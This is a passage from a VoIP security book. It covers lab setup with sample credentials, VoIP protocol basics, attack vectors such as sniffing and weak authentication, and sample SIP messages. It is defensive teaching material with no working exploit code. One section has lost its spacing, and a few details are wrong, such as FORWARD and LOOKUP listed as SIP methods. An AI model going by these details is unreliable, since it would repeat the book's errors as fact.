Post on 17-Jul-2020
Hacking VoIP: Protocols, Attacks, and Countermeasures
Himanshu Dwivedi
Editor
William Pollock
Copyright © 2010. For information on book distributors or translations, please contact No Starch Press, Inc. directly: No Starch Press, Inc., 555 De Haro Street, Suite 250, San Francisco, CA 94107; phone: 415.863.9900; fax: 415.863.9950; info@nostarch.com; www.nostarch.com. Library of Congress Cataloging-in-Publication Data:
Dwivedi, Himanshu. Hacking VoIP: protocols, attacks, and countermeasures / Himanshu Dwivedi. p. cm. Includes index. ISBN-13: 978-1-59327-163-3; ISBN-10: 1-59327-163-8. 1. Internet telephony--Security measures. 2. Computer networks--Security measures. I. Title. TK5105.8865.P37 2009 004.69'5--dc22 2008038559
No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. The information in this book is distributed on an "As Is" basis, without warranty. While every precaution has been taken in the preparation of this work, neither the author nor No Starch Press, Inc. shall have any liability to any person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information contained in it.
DEDICATION
This book is FOR MY DAD, quite simply the best human being I have ever met. This book is dedicated to my family, specifically:
My daughter, Sonia Raina Dwivedi, for her smiles, laughs, persistence, flexibility, inflexibility, vocabulary, and the ability to make everybody around her happy.
My son, whose presence brings more happiness to everyone around him.
My wife, Kusum Pandey, who simply makes it all worthwhile… and then some!
ACKNOWLEDGMENTS
I'd like to acknowledge and thank Adam Wright, whose support throughout the writing of this book was well above the typical call of duty. Thanks, Adam, for helping me out during the non-peak times. Special thanks to Zane Lackey for two things—his work on the IAX Security chapter as well as his technical review of the entire book. Thank you, Zane, for being a very dependable and highly skilled individual.
INTRODUCTION
Hacking VoIP is a security book written primarily for VoIP administrators. The book will focus on administrators of enterprise networks that have deployed VoIP and administrators who are thinking about implementing VoIP on their network. The book assumes readers are familiar with the basics of VoIP, such as signaling and media protocols, and will dive straight into the security exposures of each of them (there is little info on how VoIP works, but rather the security concerns related to it). The book primarily focuses on enterprise issues, such as H.323, and devotes less attention to issues with small or PC-based VoIP deployments. The primary goal of this book is to show administrators the security exposures of VoIP and ways to mitigate those exposures.
Book Overview
This book will focus on the security aspects of VoIP networks, devices, and protocols. After a general overview in Chapter 1, "An Introduction to VoIP Security," the first section, "VoIP Protocols," will focus on the security issues in common VoIP protocols, such as SIP, H.323, IAX, and RTP. Chapter 2, "Signaling: SIP Security," and Chapter 3, "Signaling: H.323 Security," both have similar formats; they briefly describe how the protocols work and then show the security issues relevant to them. The Real-time Transport Protocol is discussed in Chapter 4, "Media: RTP Security." While both SIP and H.323 use RTP for the media layer, it has its own security issues and vulnerabilities. Chapter 4 will also briefly discuss how the protocol works and then cover the potential attacks against it. Chapter 5, "Signaling and Media: IAX Security," will cover IAX; while it is not necessarily as common as SIP, H.323, or RTP, IAX is becoming more widespread because of its use by Asterisk, the very popular open source IP PBX software. Additionally, unlike other VoIP protocols, IAX can handle both session setup and media transfer within itself on a single port, making it attractive for many newcomers to the VoIP market.
The second section of the book, "VoIP Security Threats," focuses on three different areas that are affected by weak VoIP protocols. The first chapter of this section, Chapter 6 ("Attacking VoIP Infrastructure"), will focus on the security issues of VoIP devices. The chapter will discuss the basics of sniffing on VoIP networks, attacks on hard phones, attacks on popular VoIP products from Cisco and Avaya, and attacks on infrastructure VoIP products such as gatekeepers, registrars, and proxies. This chapter will show how many VoIP entities are susceptible to attacks similar to those directed at any other devices on the IP network. Chapter 7, "Unconventional VoIP Security Threats," is a fun one, as it will show some tricky attacks using VoIP devices. While the attacks shown in this chapter are not specific to VoIP itself, the chapter shows how the technology can be used to abuse other users/systems. For example, Caller ID spoofing, Vishing (VoIP phishing), and telephone number hijacking with the use of VoIP (rather than against VoIP) are all shown in this chapter. Chapter 8, "Home VoIP Solutions," discusses the security issues in home VoIP solutions, such as Vonage, or simply softphones available from Microsoft, eBay, Google, and Yahoo!.
The final section of the book, "Assess and Secure VoIP," shows how to secure VoIP networks. Chapter 9, "Securing VoIP," shows how to protect against many of the attacks discussed in the first two sections of the book. While it's not possible to secure against all attacks, this chapter does show how to mitigate them.
Note✎
For an attack on VoIP to be possible, only one side of the conversation needs to be using VoIP. The other side can be any landline, mobile phone, or another VoIP line.
The solutions discuss the need for stronger authentication, encryption solutions, and new technology to protect VoIP soft clients. Finally, Chapter 10, "Auditing VoIP for Security Best Practices," introduces an audit program for VoIP. The VoIP Security Audit Program (VSAP) provides a long list of topics, questions, and satisfactory/unsatisfactory scores for the end user. The program's goal is to allow VoIP administrators and security experts to evaluate VoIP deployments in terms of security.
In addition to in-depth discussions about VoIP security issues, the book also covers many free security tools currently available on the Internet. These tools can help supplement the learning process by allowing readers to test their own VoIP networks and identify any security holes and/or weaknesses. And in addition to the security testing tools, step-by-step testing procedures have been supplied after every major section in each chapter. For example, in order to fully understand a security threat, practical application of the issue is often very important. This book provides step-by-step procedures and links to the most current information. This approach should ensure that readers have everything they need to understand what is being presented and why. Each chapter has a common structure, which is to introduce a VoIP topic, discuss the security aspects of the topic, discuss the tools that can be used with the topic and any step-by-step procedures to fully explain or demonstrate the topic/tool, and then explain the mitigation procedures to protect the VoIP network.
Additionally, various character styles throughout the book have significance for the reader. Filenames and file paths will appear in italics, and elements from the user interface that the reader is instructed to click or choose will appear in bold. Excerpts from code will appear in a monospace font, and input that the reader is instructed to type into the user interface will appear in bold monospace. Placeholders and variables in code will appear in monospace italic, and placeholders that the reader needs to fill in will appear in monospace bold italic.
Lab Setup
Security vulnerabilities often get lost in discussions, whitepapers, or books without practical examples. The ability to read about a security issue and then perform a quick example significantly adds to the education process. Thus, this book provides step-by-step testing procedures and demonstrations for many of the security issues covered. In order to perform the VoIP testing described in the chapters adequately, a non-production lab environment should be created. This section discusses the specific lab environment that was used for most of the attacks discussed in this book, as well as configuration files to set up the devices and software. It should be noted that readers are not expected to license expensive software from Cisco and Avaya; thus, only free or evaluation software has been used in all labs. However, all attacks shown in the book apply to both open source and commercial software/devices (Cisco/Avaya) depending on the VoIP protocols that are supported. For example, the security vulnerabilities and attacks against SIP will apply consistently to any device, commercial or free, that supports it. For the lab setup, any SIP/IAX/H.323 client can be used with any SIP Registrar/Proxy, H.323 gatekeeper, and PBX software, including Asterisk, Cisco, Polycom, or Avaya. We work with the following software because of ease of use, but we do not make any security guarantee or functional quality statement for any of them.
SIP client: X-Lite, which can be downloaded from http://www.xten.com/index.php?menu=download/
H.323 client: Ekiga, which can be downloaded from http://www.ekiga.org/, or PowerPlay, which can be downloaded from http://www.bnisolutions.com/products/powerplay/ipcontact.html/
IAX client: iaxComm, which can be downloaded from http://iaxclient.sourceforge.net/iaxcomm/
SIP/H.323/IAX server (proxy, registrar, and gatekeeper): Asterisk PBX, which can be downloaded from http://www.asterisk.org/; a virtual image of Asterisk can be downloaded from http://www.vmware.com/vmtn/appliances/directory/302/, and the free virtual image player can also be downloaded from http://www.vmware.com/download/player/
Attacker's workstation: BackTrack Live CD (version 2), which can be downloaded from http://www.remote-exploit.org/backtrack.html/; this ISO can also be used with the virtual image player mentioned previously
SIP/IAX/H.323 Server
Complete the following steps to configure the SIP/IAX/H.323 server (Asterisk PBX):
1. Load the Asterisk PBX by using the Asterisk PBX Virtual Machine (VoIPonCD-appliance) on the VMware Player.
2. Unzip VoIP-appliance.zip onto your hard drive. Using VMware Player, load VoIPonCD.
3. Back up iax.conf, sip.conf, H.323.conf, and extensions.conf on the Asterisk PBX system.
4. Back up the existing extensions.conf file (cp /etc/asterisk/extensions.conf /etc/asterisk/extensions.original.conf).
5. Back up the existing sip.conf file (cp /etc/asterisk/sip.conf /etc/asterisk/sip.original.conf).
6. Back up the existing H.323.conf file (cp /etc/asterisk/H.323.conf /etc/asterisk/H.323.original.conf).
7. Back up the existing iax.conf file (cp /etc/asterisk/iax.conf /etc/asterisk/iax.original.conf).
8. Configure the Asterisk PBX system as follows:
a. Download iax.conf, sip.conf, H.323.conf, and extensions.conf from http://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/
b. Copy all the files to /etc/asterisk, overwriting the originals.
9. Restart the Asterisk PBX system (/etc/init.d/asterisk restart).
Done! You now have a working lab setup for the Asterisk PBX.
SIP Setup
Complete the following steps to configure the SIP server and SIP client:
1. Download the preconfigured sip.conf file from http://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/
2. Copy sip.conf to /etc/asterisk on the VoIP VMware appliance.
3. Start X-Lite and right-click in its main interface.
4. Select SIP Account Settings.
5. Select Add and enter the following information for each field:
a. Username: Sonia
b. Password: HackmeAmadeus
c. Domain: IP address of the Asterisk PBX server
d. Check the Register with domain and receive incoming calls box and select the Target Domain radio button.
6. Select OK and Close.
Done! You are now registered to a SIP server using the SIP client.
H.323 Setup (Ekiga)
Complete the following steps to configure the H.323 client:
1. Open Ekiga (Start ► Programs ► Ekiga ► Ekiga).
2. Go to Edit ► Accounts ► Add and enter the following information:
a. Account name: H.323 Lab Client
b. Protocol: H.323
c. Gatekeeper: IP address of the Asterisk PBX server
d. User: Username
e. Password: Password
Done! You are now registered to an H.323 server using the H.323 client.
IAX Setup
Complete the following steps to configure the IAX client:
1. Open iaxComm.
2. From the menu bar, select Options ► Accounts.
3. Select Add and enter the following information:
a. Account name: anything
b. Host: IP address of Asterisk PBX
c. Username: Sonia
d. Password: 123voiptest
4. Select Save.
5. Select Done.
Done! You are now registered to an IAX server using the IAX client. At this point, the lab is set up to perform all the attack exercises listed in each chapter of the book.
Chapter 1. AN INTRODUCTION TO VOIP SECURITY
From the Democratic Party's headquarters in the Watergate complex in 1972 to Hewlett-Packard (HP) in 2006, attacks on telephone infrastructure have been around for some time. While those who attacked the Democratic Party and those who attacked HP had different motives, their intentions were very similar: the recording of telephone conversations containing sensitive information. The advent of phone calls over the Internet, by way of Voice over IP (VoIP), does not change the motives or the types of people involved (professional attackers, members of organized crime, and your friendly neighborhood teenager). However, it does make such attacks easier. Imagine how happy President Richard Nixon's campaign committee would have been if its operatives had had the ability to tap the Democratic Party's telephones in the Watergate complex remotely. Or imagine how thrilled HP executives would have been if they could have simply deployed VoIP in order to secretly record conversations. Now imagine how happy your boss, your employees, your son or daughter, your mother or father, organized crime individuals, your cubicle-mate, or that suspicious person in the conference room on the eighth floor may feel when they learn how easy it is to listen to your most sensitive phone calls, including ones where you have to provide your social security or credit card number to the other party. For those of us who do not like the National Security Agency (NSA) listening in on our phone calls, the problems of privacy and security have just gotten worse.
The primary purpose of this book is to explain VoIP security from a hacking perspective. We'll cover attacks on VoIP infrastructure, protocols, and implementations, as well as the methods to defend against the known vulnerabilities. Security concerns aside, VoIP is an exciting new technology that, as noted earlier, allows users to place telephone calls over the Internet. Rather than traditional phone lines, voice communication uses Internet Protocol (IP) networking. While the geek factor of using VoIP is certainly appealing, cost has been a major driver for many VoIP deployments. For example, organizations can save thousands of dollars per year by switching to VoIP. Saving money by using the Internet in this manner has been a popular trend in the past two decades; however, so has the exploitation of the related security problems. VoIP relies on protocol traits that have plagued network administrators for years. The use of cleartext protocols, the lack of proper authentication, and the complexity of deploying strong end-to-end security are just a few examples of why VoIP networks are susceptible to attack. The goal of this book is to raise awareness, describe potential attacks, and offer solutions for VoIP security risks and exposures.
This chapter covers some basics on VoIP, laying the groundwork for both VoIP experts and readers who are learning about VoIP for the first time. The topics covered in this chapter are:
Why VoIP
VoIP Basics
VoIP Security Basics
Attack Vectors
Why VoIP
The following list summarizes why VoIP security is important. Similar to any newer technology and its security-related aspects, a long list of arguments often appears on why security is not needed. The following is a non-exhaustive list of why security is important to VoIP:
Implicit assumption of privacy
Most users believe their phone calls are relatively private, at least from the users surrounding them, but perhaps not from the NSA. If you have ever ducked into a conference room to make a personal or otherwise sensitive phone call, you expect to have VoIP privacy.
The use of voicemail passwords
If VoIP security does not matter, then users have no need to password-protect their voicemail access. Listening to a voicemail system using insecure VoIP phones allows any person on the local segment to listen as well.
The sensitivity of voice calls
VoIP is often used in call centers, where credit card numbers, social security numbers, and other personal information are frequently transmitted. If an anonymous attacker is also listening to the call, then all the information can be considered compromised.
Home VoIP services with insecure wireless
Home VoIP use is very popular because of cost reasons, but many users are establishing their connections via insecure wireless access points. Insecure wireless access points and insecure VoIP technology can allow your neighbors or even someone passing through your neighborhood to listen to your phone calls.
Compliance with government data protection standards
Organizations have to limit the spread of sensitive user information across their data networks; however, the same idea should apply to information going across voice networks using IP.
VoIP Basics
Before we delve too far into VoIP's security issues, we should discuss the basics of the technology. Many buzzwords, protocols, and devices are associated with VoIP. In order to fully understand the security implications of all the protocols and devices that make up VoIP, we will discuss the major ones briefly.
How It Works
VoIP uses IP technology. In a manner similar to how your computer uses TCP/IP to transfer packets with data, VoIP transmits packets with audio. Instead of the data protocols—such as HTTP, HTTPS, POP3/IMAP, and SMTP—used in the transfer of data packets, VoIP packets use voice protocols, such as SIP (Session Initiation Protocol), H.323, IAX (Inter-Asterisk eXchange protocol), and RTP (Real-time Transport Protocol). The header in the TCP/IP packet for data will be the same as for VoIP, including Ethernet frames, source IP address, destination IP address, MAC information, and sequence numbers. Figure 1-1 shows an example of how VoIP integrates with the OSI model, where items in bold are common VoIP protocols.
Protocols
The primary protocols used with VoIP are SIP and H.323 at the session layer, which is used to set up a phone call, and RTP at the media layer, which handles the media portion of the call. Hence, SIP and H.323 establish a call connection and hand it off to RTP, which sends the media for the call. IAX is the one protocol that does both session setup and media (i.e., voice) transfer.
Figure 1-1. OSI model with VoIP
The setup portion for a VoIP call usually takes place with a few supporting servers, such as a SIP Proxy/Registrar and/or H.323 gatekeeper/gateways. Once the session is set up using SIP or H.323, the call is sent to the media protocol, which is RTP. Figure 1-2 shows an example.
Figure 1-2. VoIP protocols with session and media traffic
Note✎
Either SIP or H.323 is used for session setup, and then both of them use RTP for media. SIP and H.323 can coexist in one environment, such as a San Francisco office using SIP and a New York office using H.323, but the same handset usually will not use SIP and H.323 at the same time.
While SIP and H.323 perform similar setup services, they go about them in very different ways. The SIP protocol is designed similar to HTTP, where methods such as REGISTER, INVITE, FORWARD, LOOKUP, and BYE are used to set up a call. H.323 uses a collection of protocols, such as H.225, H.245, H.450, H.239, and H.460, to perform the session setup. Also, both protocols use supporting servers, such as SIP Proxies, SIP Registrar, H.323 gatekeeper, and H.323 gateway, between the two endpoints to set up a call. When the call is finally set up, both protocols use the RTP protocol for the media layer, which transfers audio between two or more endpoints. IAX, which is not as popular as SIP or H.323, is used between two Asterisk servers. Unlike SIP and H.323, IAX can be used to set up a call between two endpoints and used for the media channel. IAX does not use RTP for media transfer because the support is built into the protocol itself. This makes it attractive to organizations that desire simplicity in their VoIP deployments.
Deployments
VoIP deployments include a variety of servers, services, and applications that are used with SIP, H.323, IAX, or RTP. Depending on the deployment used, the following types of servers are used:
Endpoint: A generic term used for either a hard phone or softphone
H.323 gatekeeper: Registers and authenticates H.323 endpoints and stores a database of all registered H.323 clients on the network
H.323 gateway: Routes calls between H.323 gatekeepers
Hard phones: A physical telephone/handset using IP for voice communication
IP PBX: A Private Branch Exchange (PBX) system that uses IP for voice communication; used to route telephone calls from one entity to another
Session Border Controller: Helps VoIP networks communicate across trust boundaries (SBCs generally provide a path around firewalls, not work with or through them)
SIP Proxy: Proxies communication between SIP User Agents and servers
SIP Registrar: Registers and authenticates SIP User Agents (via the REGISTER method); it also stores a database of all registered SIP clients on the network
Softphones: A software telephone using IP for voice communication
Depending on the solution an organization wishes to use, one or more of these types of systems are used. Figure 1-3 shows a VoIP architecture using SIP/RTP, Figure 1-4 shows a VoIP architecture using H.323/RTP, and Figure 1-5 shows a VoIP architecture using IAX.
In addition to the supporting servers, services, and applications, VoIP telephones are also used in deployments. VoIP hard phones, which are physical phones with an Ethernet connection (RJ-45) on the back, are often used. Popular vendors of VoIP hard phones include Cisco, Avaya, and Polycom. VoIP hard phones are intended to simply replace a traditional landline phone. It should be noted that a digital phone is not the same as a VoIP hard phone. Digital phones are often used in business environments while analog phones are often used in home environments, but neither are VoIP hard phones.
Figure 1-3. VoIP deployments with SIP devices
Figure 1-4. VoIP deployments with H.323 devices (RTP through firewalls)
Figure 1-5. VoIP deployments with IAX devices
VoIP softphones are software-based phones running within your computer's operating system, including Windows, Unix, Linux, or Mac OS. As implied by their software-based nature, softphones do not physically exist. A softphone uses the IP connection on your computer to make audio calls. A good example of a VoIP softphone is the popular application Skype. Yahoo! Messenger, Google Talk, and Microsoft Live Messenger are also examples. It should be noted that most hard phone vendors also provide a softphone to be used with their systems because both types of phones are simply using IP for audio connectivity. Additionally, all VoIP equipment, regardless of whether it is a softphone or a hard phone, can call each other as well as other traditional phone lines, including landlines and mobile phones. SIP hard phones/softphones are usually referred to as User Agents, and H.323 hard phones/softphones are usually referred to as endpoints. For specific definitions, refer to Basic VoIP Terminology from the VoIPSA website: http://www.voipsa.org/Activities/VOIPSA_Threat_Taxonomy_0.1.pdf/
VoIP Security Basics
Now that we have the basics of VoIP covered, let's go over some security basics. No matter what topic is being addressed, from storage to web application security, the main components of security, including authentication, authorization, availability, confidentiality, and integrity protection, will always need to be discussed.
Authentication
The authentication process in most VoIP deployments occurs at the session layer. When an endpoint connects to the network or places a phone call, authentication takes place between the VoIP phone and support servers, such as SIP Registrars, H.323 gateways, or IAX Asterisk servers. Media protocols, such as RTP or the media portion of IAX, do not require authentication because it already occurs at the session setup portion of a call. While the use of authentication is always a good thing, the use of insecure or poor authentication mechanisms is not. Unfortunately, SIP, H.323, and IAX all use weak authentication mechanisms, which are discussed in Chapters 2, 3, and 4. The most common default authentication types for each signaling protocol are:
SIP: Digest authentication
H.323: MD5 hash of general ID (username), password, and timestamp
IAX: MD5 hash of password and the challenge
When two phones are calling each other, they authenticate not to each other but to intermediate support servers. Figure 1-6 shows an example authentication process at a high level.
Figure 1-6. Authentication process at a high level
Authorization
Authorization on VoIP can sometimes be used for security purposes. For example, limiting certain VoIP endpoints' ability to dial specific phone numbers may be desirable. Permitting only certain devices to join the VoIP network also may help protect VoIP networks. It should be noted that authorization values are rarely used in enterprise VoIP deployments and are easy to bypass. Nonetheless, the following list shows what entities can be used for authorization parameters:
E.164 alias: Each H.323 endpoint contains an E.164 alias. The E.164 alias is an international number system that comprises a country code (CC), a national destination code (NDC), and a subscriber number (SN). An E.164 alias can have up to 15 alphanumeric values and can be set either dynamically by a gatekeeper device or locally by the endpoint itself.
MAC: Machine Access Control addresses are on every Ethernet-enabled (Layer 2 in the OSI model) device. These addresses are sometimes used to authorize certain devices on VoIP networks.
URI: SIP really does not have an authorization value, but the Uniform Resource Identifier (URI) is a value that each SIP User Agent contains. The value can be used to authorize endpoints. Similar to SIP, IAX does not have an authorization value, but the URI can also be used.
Availability
VoIP networks need to be up and running most of the time, if not all of the time. Unlike with other IT-managed services, such as email, calendaring, or even Internet access, users have grown to rely on telephones 100 percent of the time. Usually, users can tolerate hours when "the network is down," but they will not be very patient when they hear "the telephones cannot be used because of a Denial of Service attack." Having the ability to make reliable telephone calls is almost a mandate for VoIP. The methods used to ensure the VoIP network remains available are shown in the following list.
QoS: Quality of Service is used with VoIP. QoS contains quality requirements for certain types of packets and services. In many situations, audio packets are given priority over data packets using QoS.
Separating data networks and voice networks: Voice networks are often placed on a separate network and/or VLAN, isolating them from data packets. While the Internet is not a series of tubes that could get clogged up, separating the voice networks can isolate them from issues that appear on data networks, such as an unresponsive switch/router.
Encryption
The encryption of VoIP traffic can occur at multiple places, including the signaling or media layers. Because authentication occurs at the signaling layer and the audio packets are used at the media layer, encrypting VoIP traffic in two different segments is often required. For example, protecting the signaling but not the audio leaves the actual communication unprotected; however, protecting the media and not the signaling layer leaves the authentication information unprotected. In all situations, the following items can be used to encrypt VoIP networks:
IPSec: Point to Point IPSec gateways can be used to protect VoIP traffic over public or untrusted networks, such as the Internet. It should be noted that IPSec is often not used between endpoints because of the limited support for an IPSec client on VoIP clients.
SRTP: Secure Real Time Transfer Protocol can be used with Advanced Encryption Standard (AES) to protect the media layer during VoIP calls.
Note✎
It should be noted that if SRTP is used, in many cases the key goes across the network in cleartext on the session setup protocol (SIP or H.323). Hence it is important to also use SSL with the session setup protocol to leverage the full advantages of SRTP.
SSL: VoIP protocols can natively be wrapped with SSL (SIPS) or with Stunnel (H.323) to protect signaling protocols.
Attack Vectors
All technology has a security issue, from electronic voting machines to VoIP. One of the items that often confuses or inappropriately diffuses matters is the perceived difficulty involved in launching and carrying out an attack. The truth is that with sufficient motivation, including possible wealth, fame, or vengeance, any security issue can be exposed and exploited. VoIP attack vectors are similar to traditional vectors in networking equipment. For example, there is no need to have physical access to a phone or to the PBX closet. The access needed to perform VoIP attacks depends on the type of VoIP deployment. The most popular attack vectors for VoIP networks are shown in the following list.
A local subnet, such as an internal network, where VoIP is used: By unplugging and/or sharing a VoIP hard phone's Ethernet connection (usually sitting on one's desk), an attacker can connect to the voice network. (See Section A in Figure 1-7.)
A local network that is using wireless technology with untrusted users, such as a coffee shop, hotel room, or conference center: An attacker can simply connect to the wireless network, reroute traffic, and capture VoIP calls. (See Section B in Figure 1-7.)
A public or nontrusted network, such as the Internet, where VoIP communication is used: An attacker who has access to a public network can simply sniff the communication and capture telephone calls. (See Section C in Figure 1-7.)
Figure 1-7. VoIP attack vectors
Summary
VoIP is an exciting emerging technology. While VoIP has been around for years, organizations and home users have only recently begun to adopt it. As with any new trend, the security impact on private and sensitive information needs to be addressed. The good news is that when done correctly, VoIP can be secure. However, similar to any technology that transports confidential information, security testing and evaluation needs to be performed to properly show the potential risk to an organization. This book is an attempt to start the discussion for vulnerability detection, by showing the security weaknesses and countermeasures for most current VoIP deployments.
Part I. VOIP PROTOCOLS
Chapter 2. SIGNALING: SIP SECURITY
SIP (Session Initiation Protocol) is a very common VoIP signaling protocol. It often dominates the discussion of VoIP security; however, just like the Yankees and the Red Sox, it gets more attention than it actually deserves. H.323 is probably the more common signaling protocol in enterprise environments; however, because H.323 is very complex and not easy to acquire, it is often overshadowed by SIP. (See Chapter 3 for more on H.323 security.) This chapter is dedicated to SIP basics and security attacks, including authentication, hijacking, and Denial of Service. We'll also focus on security attacks against VoIP infrastructure, specifically SIP User Agents, Registrars, Redirect servers, and Proxy servers. For more information on SIP, refer to RFC 3261 (http://www.ietf.org/rfc/rfc3261.txt?number=3261/).
Note✎
SIP security issues are not unique to any one vendor or one type of deployment. Any device that supports SIP for session initiation, both for hard or soft phones, is subject to these issues.
In terms of deployment, SIP can be used on either softphones or hard phones. As noted in Chapter 1, a softphone is a software-based phone running on a PC or Mac, such as Skype, Google Talk, or Avaya/Cisco. Softphones usually require a software client and some type of Internet connection. A hard phone is a physical device that looks similar to the existing analog phones in many homes. Unlike an analog phone, however, a VoIP hard phone has an Ethernet connection rather than a typical telephone jack (RJ-45 instead of RJ-11).
Note✎
SIP is the session setup protocol often used with softphones; however, it is also gaining popularity in hard phone devices.
SIP Basics
A typical SIP VoIP solution includes four parts: SIP User Agents, Registrars, Redirect servers, and Proxy servers. SIP usually listens on TCP or UDP port 5060, but it can be configured to any port desired. The following is a brief overview of their functions.
User Agent
A User Agent is a softphone or hard phone with SIP calling capabilities. The User Agent can initiate calls and accept calls.
Registrar
The Registrar server registers User Agents on a network and can also be used for authenticating them.
Redirect server
The Redirect server accepts SIP requests and returns the address that should be contacted to complete the initial request (in the case of multiple locations for SIP User Agents).
Proxyserver
TheProxyserverforwardstraffictoandfromUserAgentsandotherlocationsordevices.Proxyserversmayalsobeinvolvedinroutingandauthentication.BecauseVoIPprotocolsarenotveryfirewallfriendly,aProxyserverisoftenusedtocentralizeVoIPpacketsonanetwork.
TheSIPprotocol
TheSIPprotocolisbuiltsimilarlytotheHTTPprotocol,bothcontainingdifferentrequestmethodstoinvokespecificactions.ThefollowingisalistofSIPmethodsfromthecore
protocolandtheiractions.INVITETheINVITEmethodinvitesaVoIPUserAgenttoacall.AnINVITErequestissentbyoneUserAgenttoanotherUserAgenttoinitiateacall.INVITEstravelfromthesourceUserAgenttoanynumberofRegistrars,Redirectservers,andProxyservers,andthenontothedestinationUserAgent.REGISTERTheREGISTERrequestregistersaSIPUserAgentwithaRegistrar.TheREGISTERrequestissentbyaUserAgenttoaRegistrarforthedomain,andtheRegistrarserverregistersalltheUserAgentswithinaspecificdomain.ItisalsousedwithProxyserverstoroutecallstoandfromUserAgents.ACKAnACK(acknowledge)messageissentfromoneUserAgenttoanotherinordertoconfirmreceiptofamessage.TheACKisusuallythethirdpartofathree-partprocess,indicatingthatthehandshakeiscompletedbetweentwoUserAgentsandthemediaportionofthecallcanbegin.CANCELTheCANCELmethodcancelsanexistingINVITEmessage.AUserAgentcansendaCANCELrequesttoterminateapreviousvalidrequest.BYETheBYEmethodhangsupanexistingVoIPcallorsession.TheBYEmethodisusedtoterminateaspecificsession.OPTIONSTheOPTIONSmethodisusedtolistthecapabilitiesandsupportedmethodsofaUserAgentorProxyserver.AswithHTTP,whenOPTIONSissentfromaUserAgenttoaProxyserver,theProxyservercanrespondwithalistofmethodsitsupports.
SIPMessagesASIPmessageusuallycontainsafewmoreitems,includingthefollowing:
ToFieldTherecipientoftheoriginalSIPmessageFromFieldThesenderoftheSIPmessageContactFieldTheIPaddressoftheSIPUserAgentCall-IDFieldAnumberthatuniquelyidentifiesagivencallbetweentwoUserAgents;allSIPmessagesthatbelongtoasinglecommunicationstream(asinglephonecall)usethesameCall-IDsothatthepacketswillbegroupedcorrectlyCSeqFieldSequencenumberofSIPmessages;asequencenumberisavaluethatshowstheorderofpacketswhenseveralpacketsaresentbetweenentities,anditusuallyincrementsbyoneContent-TypeFieldTheMIMEtypeforthepayload,suchasapplication/sdp
Content-LengthFieldThesizeofthepayloadinthepacketWhileSIPprovidesclearandstraightforwardmethodstocommunicatefromaUserAgenttoaRegistrar,Redirectserver,Proxyserver,oranotherUserAgent,itlacksamethodofstrongauthenticationorauthorization.ThislackofstrongsecuritycanallowattackerstoabuseSIPonVoIPnetworks.VoIPnetworksusingSIPidentifyuserswithidentifiersthatarenomoresecurethananemailaddressorawebURL.Specifically,SIPURIs(UniformResourceIdentifiers)identifyaSIPUserAgentintheformofSIP:user@domain,SIP:user@domain:port(ifthereisnoportlisted,itdefaultsto5060),orSIP:user@IPaddress.Forexample,ifSoniabelongstotheAum.comdomainandKusumbelongstotheOm.comdomain,theiridentitieswouldbeSIP:Sonia@Aum.comandSIP:Kusum@Om.com.WhenSoniacallsKusumoveraSIP-enabledVoIPnetwork,DNSserversareusedtoroutethecallappropriately(usuallyviaProxyservers).However,IPaddressescanbeusedinplaceofthedomain
Making a VoIP Call with SIP Methods

Now that we've briefly covered SIP methods, let's walk through an example of a VoIP call using the methods. The following steps highlight a sample VoIP call using SIP. The call involves two users, their User Agents (Sonia and Kusum), and their required intermediate systems. Figure 2-1 illustrates the step-by-step process.

Figure 2-1. Sample VoIP call using SIP

Registration

First, SIP User Agent Sonia registers with the Registrar in its domain (Aum.com), and SIP User Agent Kusum registers with the Registrar in its domain (Om.com). If authentication has been enabled, it occurs during the REGISTER or INVITE steps, as shown here:

REGISTER sip:Sonia@Aum.com SIP/2.0
Via: SIP/2.0/UDP 192.168.5.122:5060
From: Sonia <sip:Sonia@Aum.com>
To: Sonia <sip:Sonia@Aum.com>;tag=110806
Call-ID: 1108200600
CSeq: 1 REGISTER
Contact: <sip:Sonia@192.168.5.122>
EXPIRES: 3600
Content-Length: 0

REGISTER sip:Kusum@Om.com SIP/2.0
Via: SIP/2.0/UDP 172.16.11.17:5060
From: Kusum <sip:Kusum@Om.com>
To: Kusum <sip:Kusum@Om.com>;tag=111706
Call-ID: 1976111700
CSeq: 1 REGISTER
Contact: <sip:Kusum@172.16.11.17>
EXPIRES: 3600
Content-Length: 0

The INVITE Request

Sonia wishes to make a phone call to Kusum.

1. Sonia's User Agent sends an INVITE request to the SIP Proxy server from Sonia@Aum.com to Kusum@Om.com.

INVITE sip:Kusum@Om.com SIP/2.0
Via: SIP/2.0/UDP 192.168.5.122:5060
From: Sonia <sip:Sonia@Aum.com>;tag=110806
To: Kusum <sip:Kusum@Om.com>
Call-ID: 2006110800
CSeq: 1 INVITE
Contact: <sip:Sonia@192.168.5.122>
Content-Type: application/sdp
Content-Length: 141

2. The Proxy server in Sonia's network performs a DNS lookup for Om.com. After the lookup is complete and Om.com is located, Sonia's Proxy server sends the INVITE request to the Proxy server in Kusum's network.

3. The Proxy server in the Om.com network performs a lookup for Kusum's location. The SIP Registrar responds to the lookup with Kusum's address location. The Proxy server in Kusum's network sends a 100 Trying message to Sonia to indicate that the INVITE request has been received but not yet sent to Kusum.

4. The Proxy server in Kusum's network forwards the request to Kusum.

5. Kusum's User Agent reads the request.

SIP/2.0 100 Trying
From: Sonia <sip:Sonia@Aum.com>;tag=110806
To: Kusum <sip:Kusum@Om.com>
Call-ID: 2006110800
CSeq: 1 INVITE
Content-Length: 0

6. Kusum's User Agent sends a 180 Ringing message to Sonia, indicating that the remote telephone is ringing.

SIP/2.0 180 Ringing
From: Sonia <sip:Sonia@Aum.com>;tag=110806
To: Kusum <sip:Kusum@Om.com>
Call-ID: 2006110800
CSeq: 1 INVITE
Content-Length: 0

7. Once Kusum answers the phone, her User Agent sends a 200 OK to Sonia (assuming she wants to proceed with the phone call).

SIP/2.0 200 OK
From: Sonia <sip:Sonia@Aum.com>;tag=110806
To: Kusum <sip:Kusum@Om.com>
Call-ID: 2006110800
CSeq: 1 INVITE
Contact: <sip:Kusum@172.16.11.17>
Content-Type: application/sdp
Content-Length: 140

8. After receiving the 200 OK message, Sonia sends an ACK to Kusum, acknowledging that she received the 200 OK message and that they can proceed with the VoIP call.

ACK sip:Kusum@Om.com SIP/2.0
Via: SIP/2.0/UDP 192.168.5.120:5060
